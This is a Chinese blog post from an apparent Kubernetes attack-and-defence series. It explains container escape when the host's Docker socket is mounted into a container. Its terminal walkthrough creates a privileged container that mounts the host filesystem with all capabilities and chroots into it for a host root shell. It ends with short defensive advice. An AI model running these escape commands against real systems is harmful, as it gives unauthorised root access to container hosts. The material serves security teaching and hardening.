Kubernetes攻防 Docker in Docker

liao__ran2026-04-29 8:28

Docker in Docker

当宿主机的 /var/run/docker.sock 被挂载容器内的时候,容器内就可以通过 docker.sock 在宿主机里创建任意配置的容器,

此时可以理解为可以创建任意权限的进程;当然也可以控制任意正在运行的容器。

常见于需要对当前节点进行容器管理的编排逻辑容器里

docker 示范

shell 复制代码 
[root@localhost ~]# docker run -it -v /var/run/docker.sock:/tmp/rootfs/docker.sock 192.168.101.99:80/base/centos:8 bash
[root@072dcd1db96a /]# ls /tmp/rootfs/docker.sock 
/tmp/rootfs/docker.sock

# 在容器内访问Docker API
[root@072dcd1db96a yum.repos.d]# yum -y install docker-ce
[root@072dcd1db96a ~]# docker -H unix:///tmp/rootfs/docker.sock ps
CONTAINER ID   IMAGE                             COMMAND   CREATED          STATUS          PORTS     NAMES
072dcd1db96a   192.168.101.99:80/base/centos:8   "bash"    11 minutes ago   Up 11 minutes             dazzling_hoover

# 创建特权容器
[root@072dcd1db96a ~]# docker -H unix:///tmp/rootfs/docker.sock run -d --privileged -v /:/tmp/centos8 192.168.101.99:80/base/centos:8 sleep infinity
c3a026b0f9635aeac6875aa5609beca54a67eb766b760de43b201663d71da45e

# 进入新创建的容器
[root@072dcd1db96a ~]# docker -H unix:///tmp/rootfs/docker.sock exec -it c3a bash
[root@c3a026b0f963 /]# ls /tmp/centos8/var/run/docker.sock 
/tmp/centos8/var/run/docker.sock

# 若已经获取了此类容器的 full tty shell, 你可以用类似下述的命令创建一个通往宿主机的 shell。

[root@072dcd1db96a ~]# 
[root@072dcd1db96a ~]# docker -H unix:///tmp/rootfs/docker.sock run \
>  -d -it --rm --name rshell -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" \
>  --network=host --privileged=true --cap-add=ALL 192.168.101.99:80/base/alpine:latest
d1e094032cb227698f8cc59495f5290469ff18903bc92afde5c7101177dba3f4
[root@072dcd1db96a ~]# 
[root@072dcd1db96a ~]# docker -H unix:///tmp/rootfs/docker.sock exec -it d1e sh
/go # 
/go # chroot /rootfs/
basename: 缺少操作数
请尝试执行 "basename --help" 来获取更多信息。
[root@localhost /]# 
[root@localhost /]# ss -antulp 
Netid   State    Recv-Q   Send-Q     Local Address:Port     Peer Address:Port  Process                                                                        
tcp     LISTEN   0        128              0.0.0.0:22            0.0.0.0:*      users:(("sshd",pid=961,fd=3))                                                 
tcp     LISTEN   0        128                 [::]:22               [::]:*      users:(("sshd",pid=961,fd=4))                                                 
[root@localhost /]# 
[root@localhost /]# ps -ef 
UID          PID    PPID  C STIME TTY          TIME CMD
root           1       0  0 4月28 ?       00:00:01 /usr/lib/systemd/systemd --
root           2       0  0 4月28 ?       00:00:00 [kthreadd]
root           3       2  0 4月28 ?       00:00:00 [rcu_gp]
root           4       2  0 4月28 ?       00:00:00 [rcu_par_gp]
root           6       2  0 4月28 ?       00:00:00 [kworker/0:0H-events_highpr
root           9       2  0 4月28 ?       00:00:00 [mm_percpu_wq]
root          10       2  0 4月28 ?       00:00:00 [rcu_tasks_rude_]
root          11       2  0 4月28 ?       00:00:00 [rcu_tasks_trace]
root          12       2  0 4月28 ?       00:00:00 [ksoftirqd/0]
........

防御建议:

shell 复制代码 
1、避免将Docker socket挂载到容器中
2、如必须挂载,考虑使用Docker授权插件限制API访问
3、监控Docker API调用,检测异常行为
4、考虑使用podman、containerd等替代方案,它们提供更细粒度的权限控制
相关推荐
Nice_Fold1 小时前
Kubernetes命名空间与Pod核心概念(自用笔记)
笔记·容器·kubernetes
杨浦老苏10 小时前
大模型安全接入网关LinkAI
人工智能·docker·ai·群晖·隐私保护
Dillon Dong13 小时前
【系列主题】Next.js 16 + Turbopack 的暗礁:深入剖析 Tailwind v4 的 CSS 模块解析陷阱
javascript·css·容器·turbopack
jc062013 小时前
6.1云原生之Docker
c++·docker·云原生
JellyfishMIX16 小时前
k8s 容器 cpu 概念
docker·容器·kubernetes
BIGmustang18 小时前
基于rancher-rke部署 k8s集群
容器·kubernetes·rancher
Cat_Rocky19 小时前
通过k8s实现单pod部署
java·容器·kubernetes
运维全栈笔记19 小时前
K8S部署WordPress+MySQL:模块化YAML配置详解
服务器·mysql·docker·云原生·容器·kubernetes·服务发现
张青贤20 小时前
linux离线部署docker和docker-compose
linux·docker·docker-compose
热门推荐
01GitHub 镜像站点02近期有什么ai的新消息,新动态? 2026.4月032026年4月AI大事件深度解读:大模型竞争进入“深水区“042026年AI编程工具终极横评:Cursor vs Claude Code vs Copilot05Codex 接入 DeepSeek API 完整配置文档06【AI】2026 年具身智能模型和世界模型总结07零基础教你claude code 接入 deepseek V408在Windows 11上安装Docker的踩坑记录092026年AI前瞻:量子AI、具身智能与科学发现的新纪元10DeepSeek V4 全面解析:测评、对比、案例及实操指南